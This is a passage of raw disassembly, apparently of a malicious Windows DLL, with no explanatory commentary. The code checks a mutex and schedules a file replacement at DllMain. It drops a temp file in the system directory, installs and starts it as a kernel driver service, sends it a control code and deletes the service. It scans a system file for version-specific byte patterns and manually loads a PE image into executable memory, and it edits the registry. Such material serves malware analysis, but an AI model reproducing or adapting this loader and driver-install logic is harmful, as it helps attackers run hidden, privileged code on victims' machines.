cmp eax, 0FFFFFFFFh
jnz short loc_9A7BB6
push 4 ; dwFlags
push ebx ; lpNewFileName
push edi ; lpExistingFileName
call MoveFileExA
loc_9A7BB6: ; CODE XREF: sub_9A798D+213�j
; sub_9A798D+21D�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A798D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: start+4B�p
Name = byte ptr -14h
hModule = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+fdwReason], ebx
push esi
push edi
jnz loc_9A7C55
mov edi, [ebp+lpvReserved]
test edi, edi
jz short loc_9A7BDA
mov [ebp+hModule], edi
loc_9A7BDA: ; CODE XREF: DllMain(x,x,x)+1A�j
push [ebp+hModule] ; hLibModule
call DisableThreadLibraryCalls
test edi, edi
jz short loc_9A7C3C
call GetCurrentProcessId
push eax ; Seed
call srand
call rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp+Name]
add edx, 0Ah
push edx
push eax
call sub_9AC642
add esp, 0Ch
lea eax, [ebp+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call CreateMutexA
mov esi, eax
test esi, esi
jz short loc_9A7C3C
call GetLastError
cmp eax, 0B7h
jnz short loc_9A7C3C
push esi ; hObject
call CloseHandle
xor eax, eax
jmp short loc_9A7C57
; ---------------------------------------------------------------------------
loc_9A7C3C: ; CODE XREF: DllMain(x,x,x)+2A�j
; DllMain(x,x,x)+67�j ...
call GetVersion
cmp al, 5
jb short loc_9A7C4F
push [ebp+hModule] ; hModule
call sub_9A798D
pop ecx
loc_9A7C4F: ; CODE XREF: DllMain(x,x,x)+89�j
test edi, edi
jz short loc_9A7C55
xor ebx, ebx
loc_9A7C55: ; CODE XREF: DllMain(x,x,x)+F�j
; DllMain(x,x,x)+96�j
mov eax, ebx
loc_9A7C57: ; CODE XREF: DllMain(x,x,x)+7F�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
_DllMain@12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7C5E proc near ; CODE XREF: sub_9A7CBF+157�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_9A25D8
call __SEH_prolog
mov edi, ecx
or eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
xor edx, edx
mov [ebp+ms_exc.disabled], edx
loc_9A7C77: ; CODE XREF: sub_9A7C5E+5B�j
mov [ebp+var_20], edx
movzx ecx, word ptr [edi+6]
cmp edx, ecx
jnb short loc_9A7CA9
lea ecx, [edx+edx*4]
lea ecx, [edi+ecx*8+0F8h]
mov esi, [ecx+14h]
cmp [ebp+arg_0], esi
jb short loc_9A7CB8
mov ebx, [ecx+10h]
add ebx, esi
cmp [ebp+arg_0], ebx
jnb short loc_9A7CB8
mov eax, [ecx+0Ch]
sub eax, esi
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
loc_9A7CA9: ; CODE XREF: sub_9A7C5E+22�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_2
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9A7CB8: ; CODE XREF: sub_9A7C5E+34�j
; sub_9A7C5E+3E�j
inc edx
jmp short loc_9A7C77
sub_9A7C5E endp
; ---------------------------------------------------------------------------
mov eax, [ebp-1Ch]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9A7CBF proc near ; CODE XREF: sub_9A7E49+64�p
VersionInformation= _OSVERSIONINFOA ptr -0B4h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
Buf2 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 0B4h
push esi
mov esi, eax
cmp word ptr [esi], 5A4Dh
jnz loc_9A7E41
mov ecx, [ebp+70h+arg_4]
mov eax, [esi+3Ch]
add ecx, 0FFFFFF08h
cmp eax, ecx
jg loc_9A7E41
add eax, esi
cmp dword ptr [eax], 4550h
mov [ebp+70h+var_18], eax
jnz loc_9A7E41
lea eax, [ebp+70h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+70h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz loc_9A7E41
push ebx
xor ebx, ebx
cmp [ebp+70h+VersionInformation.dwMajorVersion], 5
mov [ebp+70h+var_10], ebx
jnz loc_9A7DA6
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFF7h
cmp eax, ebx
mov [ebp+70h+Buf2], 0FFh
mov [ebp+70h+var_3], 0D6h
mov [ebp+70h+var_2], 0C7h
mov [ebp+70h+var_1], 5
mov [ebp+70h+var_14], eax
jbe loc_9A7E3B
loc_9A7D47: ; CODE XREF: sub_9A7CBF+A9�j
push 4 ; Size
lea eax, [ebp+70h+Buf2]
push eax ; Buf2
lea eax, [ebx+esi]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7D64
cmp byte ptr [ebx+esi+8], 0Ah
jz short loc_9A7D6F
loc_9A7D64: ; CODE XREF: sub_9A7CBF+9C�j
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7D47
jmp loc_9A7E3B
; ---------------------------------------------------------------------------
loc_9A7D6F: ; CODE XREF: sub_9A7CBF+A3�j
cmp ebx, 0FFFFFFFFh
jz loc_9A7E3B
mov eax, [ebp+70h+var_18]
mov esi, [ebx+esi+4]
sub esi, [eax+34h]
cmp esi, [eax+50h]
jnb loc_9A7E3B
mov eax, [ebp+70h+arg_0]
mov [edi], esi
mov [edi+8], eax
mov dword ptr [edi+4], 0Ah
mov [ebp+70h+var_10], 1
jmp loc_9A7E3B
; ---------------------------------------------------------------------------
loc_9A7DA6: ; CODE XREF: sub_9A7CBF+61�j
cmp [ebp+70h+VersionInformation.dwMajorVersion], 6
jnz loc_9A7E3B
cmp [ebp+70h+VersionInformation.dwMinorVersion], ebx
jnz loc_9A7E3B
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFEFh
cmp eax, ebx
mov [ebp+70h+var_2], 8Bh
mov [ebp+70h+var_1], 15h
mov [ebp+70h+var_C], 83h
mov [ebp+70h+var_B], 0FAh
mov [ebp+70h+var_A], 0Ah
mov [ebp+70h+var_9], 0Fh
mov [ebp+70h+var_8], 87h
mov [ebp+70h+var_14], eax
jbe short loc_9A7E3B
loc_9A7DE2: ; CODE XREF: sub_9A7CBF+17A�j
push 2 ; Size
lea eax, [ebp+70h+var_2]
push eax ; Buf2
lea eax, [esi+ebx]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E35
push 5 ; Size
lea eax, [ebp+70h+var_C]
push eax ; Buf2
lea eax, [ebx+esi+6]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E35
mov ecx, [ebp+70h+var_18]
lea eax, [ebx+0Bh]
push eax
call sub_9A7C5E
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_9A7E35
and dword ptr [edi+8], 0
mov [edi], eax
mov eax, [ebx+esi+0Bh]
mov [edi+4], eax
mov [ebp+70h+var_10], 1
loc_9A7E35: ; CODE XREF: sub_9A7CBF+137�j
; sub_9A7CBF+14E�j ...
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7DE2
loc_9A7E3B: ; CODE XREF: sub_9A7CBF+82�j
; sub_9A7CBF+AB�j ...
mov eax, [ebp+70h+var_10]
pop ebx
jmp short loc_9A7E43
; ---------------------------------------------------------------------------
loc_9A7E41: ; CODE XREF: sub_9A7CBF+13�j
; sub_9A7CBF+27�j ...
xor eax, eax
loc_9A7E43: ; CODE XREF: sub_9A7CBF+180�j
pop esi
add ebp, 70h
leave
retn
sub_9A7CBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7E49 proc near ; CODE XREF: sub_9A812E+5A�p
FileName = byte ptr -128h
var_25 = byte ptr -25h
hMem = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset aCtlsocket ; "ctlsocket"
call __SEH_prolog
and [ebp+var_1C], 0
mov esi, 104h
push esi ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call GetSystemDirectoryA
push esi ; Count
push offset byte_9A25E4 ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call strncat
mov [ebp+var_25], 0
lea eax, [ebp+FileName]
push eax ; lpFileName
lea eax, [ebp+var_20]
push eax ; int
call sub_9AC769
add esp, 14h
mov [ebp+hMem], eax
test eax, eax
jz short loc_9A7ECD
and [ebp+ms_exc.disabled], 0
push [ebp+var_20]
push [ebp+arg_0]
mov edi, [ebp+arg_4]
call sub_9A7CBF
pop ecx
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A7EC0
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_9A7EC0: ; CODE XREF: sub_9A7E49+6E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A7ECD: ; CODE XREF: sub_9A7E49+55�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A7E49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7ED6(LPCSTR lpServiceName)
sub_9A7ED6 proc near ; CODE XREF: sub_9A7F9D+16B�p
ServiceStatus = _SERVICE_STATUS ptr -20h
var_4 = dword ptr -4
lpServiceName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
xor esi, esi
push 0F003Fh ; dwDesiredAccess
push esi ; lpDatabaseName
push esi ; lpMachineName
mov [ebp+var_4], esi
call OpenSCManagerA
mov ebx, eax
cmp ebx, esi
jz short loc_9A7F30
push edi
push 0F01FFh ; dwDesiredAccess
push [ebp+lpServiceName] ; lpServiceName
push ebx ; hSCManager
call OpenServiceA
mov edi, eax
cmp edi, esi
mov esi, CloseServiceHandle
jz short loc_9A7F2C
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push edi ; hService
call ControlService
push edi ; hService
mov [ebp+var_4], eax
call DeleteService
push edi ; hSCObject
call esi ; CloseServiceHandle
loc_9A7F2C: ; CODE XREF: sub_9A7ED6+3A�j
push ebx ; hSCObject
call esi ; CloseServiceHandle
pop edi
loc_9A7F30: ; CODE XREF: sub_9A7ED6+1E�j
mov eax, [ebp+var_4]
pop esi
pop ebx
leave
retn
sub_9A7ED6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7F37(LPCSTR lpDisplayName,LPCSTR lpBinaryPathName)
sub_9A7F37 proc near ; CODE XREF: sub_9A7F9D+108�p
hSCObject = dword ptr -4
lpDisplayName = dword ptr 8
lpBinaryPathName= dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push 0F003Fh ; dwDesiredAccess
xor esi, esi
push esi ; lpDatabaseName
push esi ; lpMachineName
call OpenSCManagerA
cmp eax, esi
mov [ebp+hSCObject], eax
jz short loc_9A7F98
push ebx
push edi
push offset WindowName ; "recv"
push esi ; lpServiceStartName
push esi ; lpDependencies
push esi ; lpdwTagId
push esi ; lpLoadOrderGroup
push [ebp+lpBinaryPathName] ; lpBinaryPathName
push esi ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0F01FFh ; dwDesiredAccess
push [ebp+lpDisplayName] ; lpDisplayName
push [ebp+lpDisplayName] ; lpServiceName
push eax ; hSCManager
call CreateServiceA
mov edi, CloseServiceHandle
mov ebx, eax
cmp ebx, esi
jz short loc_9A7F91
push esi ; lpServiceArgVectors
push esi ; dwNumServiceArgs
push ebx ; hService
call StartServiceA
push ebx ; hSCObject
mov esi, eax
call edi ; CloseServiceHandle
loc_9A7F91: ; CODE XREF: sub_9A7F37+4A�j
push [ebp+hSCObject] ; hSCObject
call edi ; CloseServiceHandle
pop edi
pop ebx
loc_9A7F98: ; CODE XREF: sub_9A7F37+19�j
mov eax, esi
pop esi
leave
retn
sub_9A7F37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7F9D(LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPVOID lpInBuffer)
sub_9A7F9D proc near ; CODE XREF: sub_9A812E+73�p
PathName = byte ptr -234h
var_131 = byte ptr -131h
FileName = byte ptr -130h
ServiceName = byte ptr -2Ch
BytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
hObject = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpInBuffer = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 234h
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+ServiceName]
add edx, ecx
push edx
push eax
call sub_9AC642
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call GetSystemDirectoryA
mov esi, GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
mov edi, offset PrefixString ; "ror"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9A802B
lea eax, [ebp+PathName]
push eax ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
loc_9A802B: ; CODE XREF: sub_9A7F9D+62�j
mov esi, CreateFileA
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 6 ; dwShareMode
mov edi, 0C0000000h
push edi ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz short loc_9A805A
xor eax, eax
jmp loc_9A8129
; ---------------------------------------------------------------------------
loc_9A805A: ; CODE XREF: sub_9A7F9D+B4�j
lea eax, [ebp+FileName]
push 120136h ; int
push eax ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hObject] ; hFile
call WriteFile
test eax, eax
jz loc_9A8110
mov eax, [ebp+nNumberOfBytesToWrite]
cmp [ebp+BytesReturned], eax
jnz short loc_9A8110
push [ebp+hObject] ; hObject
call CloseHandle
lea eax, [ebp+FileName]
push eax ; lpBinaryPathName
lea eax, [ebp+ServiceName]
push eax ; lpDisplayName
call sub_9A7F37
pop ecx
mov [ebp+hObject], eax
pop ecx
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA
cmp [ebp+hObject], ebx
jz short loc_9A8126
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push ebx ; dwShareMode
push edi ; dwDesiredAccess
push (offset WindowName+4) ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A8104
push ebx ; lpOverlapped
lea eax, [ebp+BytesReturned]
push eax ; lpBytesReturned
push ebx ; nOutBufferSize
push ebx ; lpOutBuffer
push 0Ch ; nInBufferSize
push [ebp+lpInBuffer] ; lpInBuffer
push 9C402000h ; dwIoControlCode
push esi ; hDevice
call DeviceIoControl
test eax, eax
jz short loc_9A80FD
mov [ebp+var_8], 1
loc_9A80FD: ; CODE XREF: sub_9A7F9D+157�j
push esi ; hObject
call CloseHandle
loc_9A8104: ; CODE XREF: sub_9A7F9D+13B�j
lea eax, [ebp+ServiceName]
push eax ; lpServiceName
call sub_9A7ED6
pop ecx
jmp short loc_9A8126
; ---------------------------------------------------------------------------
loc_9A8110: ; CODE XREF: sub_9A7F9D+E6�j
; sub_9A7F9D+F2�j
push [ebp+hObject] ; hObject
call CloseHandle
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileA
loc_9A8126: ; CODE XREF: sub_9A7F9D+122�j
; sub_9A7F9D+171�j
mov eax, [ebp+var_8]
loc_9A8129: ; CODE XREF: sub_9A7F9D+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A7F9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A812E proc near ; CODE XREF: sub_9A7170+9A�p
VersionInformation= _OSVERSIONINFOA ptr -0A8h
var_14 = word ptr -14h
InBuffer = byte ptr -0Ch
push ebp
lea ebp, [esp-78h]
sub esp, 0A8h
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz short loc_9A81AB
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnb short loc_9A8159
xor eax, eax
inc eax
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A8159: ; CODE XREF: sub_9A812E+24�j
jnz short loc_9A817F
xor eax, eax
inc eax
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A81AD
cmp [ebp+78h+VersionInformation.dwMinorVersion], eax
jnz short loc_9A8172
cmp [ebp+78h+var_14], 2
jnb short loc_9A817F
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A8172: ; CODE XREF: sub_9A812E+39�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A817F
cmp [ebp+78h+var_14], 0
jz short loc_9A81AD
loc_9A817F: ; CODE XREF: sub_9A812E:loc_9A8159�j
; sub_9A812E+40�j ...
lea eax, [ebp+78h+InBuffer]
push eax
push 10000000h
call sub_9A7E49
test eax, eax
pop ecx
pop ecx
jz short loc_9A81AB
lea eax, [ebp+78h+InBuffer]
push eax ; lpInBuffer
push 1000h ; nNumberOfBytesToWrite
push offset aServicew ; "ServiceW"
call sub_9A7F9D
add esp, 0Ch
jmp short loc_9A81AD
; ---------------------------------------------------------------------------
loc_9A81AB: ; CODE XREF: sub_9A812E+1E�j
; sub_9A812E+63�j
xor eax, eax
loc_9A81AD: ; CODE XREF: sub_9A812E+29�j
; sub_9A812E+34�j ...
add ebp, 78h
leave
retn
sub_9A812E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A81B2(void *Src,int,int,int)
sub_9A81B2 proc near ; CODE XREF: sub_9A89A9+7F�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hModule = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov edi, [ebp+Src]
cmp word ptr [edi], 5A4Dh
jz short loc_9A81CA
xor eax, eax
jmp loc_9A8393
; ---------------------------------------------------------------------------
loc_9A81CA: ; CODE XREF: sub_9A81B2+F�j
mov eax, [ebp+arg_4]
push esi
mov esi, [edi+3Ch]
add eax, 0FFFFFFFCh
cmp esi, eax
jbe short loc_9A81DF
loc_9A81D8: ; CODE XREF: sub_9A81B2+35�j
; sub_9A81B2+3B�j
xor eax, eax
jmp loc_9A8392
; ---------------------------------------------------------------------------
loc_9A81DF: ; CODE XREF: sub_9A81B2+24�j
add esi, edi
cmp dword ptr [esi], 4550h
jnz short loc_9A81D8
cmp dword ptr [esi+28h], 0
jz short loc_9A81D8
push ebx
push 40h ; flProtect
push 101000h ; flAllocationType
push dword ptr [esi+50h] ; dwSize
push 0 ; lpAddress
call VirtualAlloc
mov ebx, eax
test ebx, ebx
jnz short loc_9A820F
loc_9A8208: ; CODE XREF: sub_9A81B2+1D8�j
xor eax, eax
jmp loc_9A8391
; ---------------------------------------------------------------------------
loc_9A820F: ; CODE XREF: sub_9A81B2+54�j
cmp [ebp+arg_8], 0
jz short loc_9A8254
push 40h ; Size
push edi ; Src
push ebx ; Dst
call memcpy
mov eax, [edi+3Ch]
push 0F8h ; Size
add eax, ebx
push esi ; Src
push eax ; Dst
call memcpy
movzx eax, word ptr [esi+6]
lea eax, [eax+eax*4]
shl eax, 3
push eax ; Size
lea eax, [esi+0F8h]
push eax ; Src
mov eax, [edi+3Ch]
lea eax, [eax+ebx+0F8h]
push eax ; Dst
call memcpy
add esp, 24h
loc_9A8254: ; CODE XREF: sub_9A81B2+61�j
and [ebp+var_4], 0
cmp word ptr [esi+6], 0
jbe short loc_9A828B
lea edi, [esi+10Ch]
loc_9A8265: ; CODE XREF: sub_9A81B2+D7�j
mov eax, [edi]
add eax, [ebp+Src]
push dword ptr [edi-0Ch] ; Size
push eax ; Src
mov eax, [edi-8]
add eax, ebx
push eax ; Dst
call memcpy
movzx eax, word ptr [esi+6]
add esp, 0Ch
inc [ebp+var_4]
add edi, 28h
cmp [ebp+var_4], eax
jb short loc_9A8265
loc_9A828B: ; CODE XREF: sub_9A81B2+AB�j
mov eax, [esi+0A0h]
mov edx, ebx
sub edx, [esi+34h]
jz short loc_9A82A0
test eax, eax
jz loc_9A837C
loc_9A82A0: ; CODE XREF: sub_9A81B2+E4�j
add eax, ebx
cmp dword ptr [esi+0A4h], 0
mov [ebp+var_C], eax
jbe short loc_9A82EB
loc_9A82AE: ; CODE XREF: sub_9A81B2+137�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
lea edi, [eax+8]
jz short loc_9A82DB
mov [ebp+Src], ecx
loc_9A82BE: ; CODE XREF: sub_9A81B2+127�j
xor ecx, ecx
mov cx, [edi]
test ch, 0F0h
jz short loc_9A82D4
and ecx, 0FFFh
add ecx, ebx
add ecx, [eax]
add [ecx], edx
loc_9A82D4: ; CODE XREF: sub_9A81B2+114�j
inc edi
inc edi
dec [ebp+Src]
jnz short loc_9A82BE
loc_9A82DB: ; CODE XREF: sub_9A81B2+107�j
add eax, [eax+4]
mov ecx, eax
sub ecx, [ebp+var_C]
cmp ecx, [esi+0A4h]
jb short loc_9A82AE
loc_9A82EB: ; CODE XREF: sub_9A81B2+FA�j
lea eax, [esi+80h]
test eax, eax
jz short loc_9A836B
mov edi, [eax]
add edi, ebx
jmp short loc_9A8364
; ---------------------------------------------------------------------------
loc_9A82FB: ; CODE XREF: sub_9A81B2+1B7�j
add eax, ebx
push eax ; lpLibFileName
call LoadLibraryA
mov [ebp+hModule], eax
mov eax, [edi+10h]
add eax, ebx
xor ecx, ecx
cmp [edi+4], ecx
mov [ebp+var_10], eax
jnz short loc_9A831A
mov eax, [edi]
add eax, ebx
loc_9A831A: ; CODE XREF: sub_9A81B2+162�j
cmp [eax], ecx
mov [ebp+var_4], eax
mov [ebp+Src], ecx
jz short loc_9A8361
mov [ebp+var_C], ecx
loc_9A8327: ; CODE XREF: sub_9A81B2+1AD�j
mov eax, [eax]
test eax, eax
jns short loc_9A8334
and eax, 0FFFFh
jmp short loc_9A8338
; ---------------------------------------------------------------------------
loc_9A8334: ; CODE XREF: sub_9A81B2+179�j
lea eax, [eax+ebx+2]
loc_9A8338: ; CODE XREF: sub_9A81B2+180�j
push eax ; lpProcName
push [ebp+hModule] ; hModule
call GetProcAddress
mov ecx, [ebp+var_C]
mov edx, [ebp+var_10]
inc [ebp+Src]
mov [ecx+edx], eax
mov eax, [ebp+Src]
mov ecx, [ebp+var_4]
shl eax, 2
mov [ebp+var_C], eax
add eax, ecx
cmp dword ptr [eax], 0
jnz short loc_9A8327
loc_9A8361: ; CODE XREF: sub_9A81B2+170�j
add edi, 14h
loc_9A8364: ; CODE XREF: sub_9A81B2+147�j
mov eax, [edi+0Ch]
test eax, eax
jnz short loc_9A82FB
loc_9A836B: ; CODE XREF: sub_9A81B2+141�j
push [ebp+arg_C]
mov esi, [esi+28h]
push 1
add esi, ebx
push ebx
call esi
test eax, eax
jnz short loc_9A838F
loc_9A837C: ; CODE XREF: sub_9A81B2+E8�j
push 8000h ; dwFreeType
push 0 ; dwSize
push ebx ; lpAddress
call VirtualFree
jmp loc_9A8208
; ---------------------------------------------------------------------------
loc_9A838F: ; CODE XREF: sub_9A81B2+1C8�j
mov eax, ebx
loc_9A8391: ; CODE XREF: sub_9A81B2+58�j
pop ebx
loc_9A8392: ; CODE XREF: sub_9A81B2+28�j
pop esi
loc_9A8393: ; CODE XREF: sub_9A81B2+13�j
pop edi
leave
retn
sub_9A81B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8396 proc near ; CODE XREF: sub_9A8462+14�p
; sub_9A8462+2E�p
var_8 = dword ptr -8
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push edi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20019h ; samDesired
xor edi, edi
push edi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
mov [ebp+var_8], edi
push [ebp+hKey] ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9A8413
push esi
mov esi, RegQueryValueExA
push ebx ; lpcbData
push edi ; lpData
push edi ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_9A8409
push dword ptr [ebx] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
cmp eax, edi
mov ecx, [ebp+arg_C]
mov [ecx], eax
jz short loc_9A8409
push ebx ; lpcbData
push eax ; lpData
push edi ; lpType
push edi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_9A83FE
mov [ebp+var_8], 1
jmp short loc_9A8409
; ---------------------------------------------------------------------------
loc_9A83FE: ; CODE XREF: sub_9A8396+5D�j
mov eax, [ebp+arg_C]
push dword ptr [eax] ; hMem
call GlobalFree
loc_9A8409: ; CODE XREF: sub_9A8396+3A�j
; sub_9A8396+4D�j ...
push [ebp+phkResult] ; hKey
call RegCloseKey
pop esi
loc_9A8413: ; CODE XREF: sub_9A8396+23�j
mov eax, [ebp+var_8]
pop edi
leave
retn
sub_9A8396 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8419(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData)
sub_9A8419 proc near ; CODE XREF: sub_9A84A0+15�p
; sub_9A84A0+2D�p
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20006h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9A845D
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push 3 ; dwType
push esi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegSetValueExA
test eax, eax
jnz short loc_9A8454
inc esi
loc_9A8454: ; CODE XREF: sub_9A8419+38�j
push [ebp+phkResult] ; hKey
call RegCloseKey
loc_9A845D: ; CODE XREF: sub_9A8419+1F�j
mov eax, esi
pop esi
leave
retn
sub_9A8419 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8462 proc near ; CODE XREF: sub_9A84E1+17�p
; sub_9A8B47+3E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push [ebp+arg_8]
mov ebx, eax
push [ebp+arg_4]
push [ebp+arg_0]
push 80000001h
call sub_9A8396
add esp, 10h
test eax, eax
jnz short loc_9A849A
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 80000002h
call sub_9A8396
add esp, 10h
jmp short loc_9A849D
; ---------------------------------------------------------------------------
loc_9A849A: ; CODE XREF: sub_9A8462+1E�j
xor eax, eax
inc eax
loc_9A849D: ; CODE XREF: sub_9A8462+36�j
pop ebx
pop ebp
retn
sub_9A8462 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A84A0(LPCSTR lpSubKey,LPCSTR lpValueName,BYTE *lpData,DWORD cbData)
sub_9A84A0 proc near ; CODE XREF: sub_9A8579+75�p
; sub_9A878B+12�p
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
